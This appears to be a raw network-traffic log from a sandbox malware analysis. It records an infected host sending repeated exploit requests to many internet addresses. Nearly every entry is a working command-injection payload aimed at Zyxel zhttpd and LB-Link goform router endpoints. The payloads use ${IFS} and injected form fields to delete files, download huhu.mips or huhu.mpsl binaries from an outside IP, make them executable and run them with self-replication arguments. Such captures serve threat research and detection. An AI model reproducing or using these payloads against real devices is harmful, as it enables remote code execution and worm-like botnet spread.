                                            Feb 2, 2024 06:21:03.460563898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2130192.168.2.154164060.154.124.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460602045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2131192.168.2.1542810187.252.59.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460623026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2132192.168.2.15335645.228.249.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460649967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2133192.168.2.155231077.252.230.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460669041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2134192.168.2.155181024.154.165.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460709095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2135192.168.2.155929681.12.108.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460742950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2136192.168.2.1535436217.68.242.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460776091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2137192.168.2.1535106210.223.39.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460815907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2138192.168.2.1554330167.171.217.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460860968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2139192.168.2.1533622194.201.177.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460896015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2140192.168.2.1559184193.219.13.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460926056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2141192.168.2.1549244194.215.148.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.460961103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2142192.168.2.1550078180.46.241.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.461003065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2143192.168.2.154258294.50.102.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464163065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2144192.168.2.1533636180.90.109.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464181900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2145192.168.2.1538262217.111.158.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464224100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2146192.168.2.1551532155.100.102.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464294910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2147192.168.2.154213812.172.219.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464313984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2148192.168.2.155936844.171.93.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464361906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2149192.168.2.1553704208.78.158.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464394093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2150192.168.2.1557576120.251.26.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.464426041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2151192.168.2.1551026175.201.61.598080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.779789925 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2152192.168.2.154759834.49.144.1678080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.884160042 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2153192.168.2.1534788168.196.241.2258080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.898240089 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:04.016650915 CET1260INHTTP/1.1 400 Bad Request
                                            Server: squid/6.0.0-20220501-re899e0c27
                                            Mime-Version: 1.0
                                            Date: Fri, 02 Feb 2024 05:21:03 GMT
                                            Content-Type: text/html;charset=utf-8
                                            Content-Length: 3586
                                            X-Squid-Error: ERR_INVALID_URL 0
                                            Vary: Accept-Language
                                            Content-Language: en
                                            Cache-Status: ezproxies.com
                                            Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2154192.168.2.154622045.223.174.1158080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.209561110 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:04.355212927 CET907INHTTP/1.1 503 Service Unavailable
                                            Content-Type: text/html
                                            Cache-Control: no-cache, no-store
                                            Connection: close
                                            Content-Length: 688
                                            X-Iinfo: 14-25398442-0 0NNN RT(1706851263338 0) q(0 -1 -1 -1) r(0 -1)
                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 34 2d 32 35 33 39 38 34 34 32 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 36 38 35 31 32 36 33 33 33 38 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 31 39 31 32 39 31 38 35 38 33 35 39 35 31 31 38 32 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 31 39 31 32 39 31 38 35 38 33 35 39 35 31 31 38 32 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=14-25398442-0%200NNN%20RT%281706851263338%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-119129185835951182&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-119129185835951182</iframe></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2155192.168.2.155634631.200.61.1028080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.451530933 CET225OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2156192.168.2.1557048126.80.191.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471350908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2157192.168.2.15469129.192.176.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471384048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2158192.168.2.153877424.218.53.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471410036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2159192.168.2.155511071.171.100.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471426010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2160192.168.2.15523628.212.226.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471456051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2161192.168.2.1559982146.122.248.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471512079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2162192.168.2.1558408140.0.204.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471549034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2163192.168.2.1549678200.92.127.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471581936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2164192.168.2.155797869.63.82.145443
                                            TimestampBytes transferredDirectionData
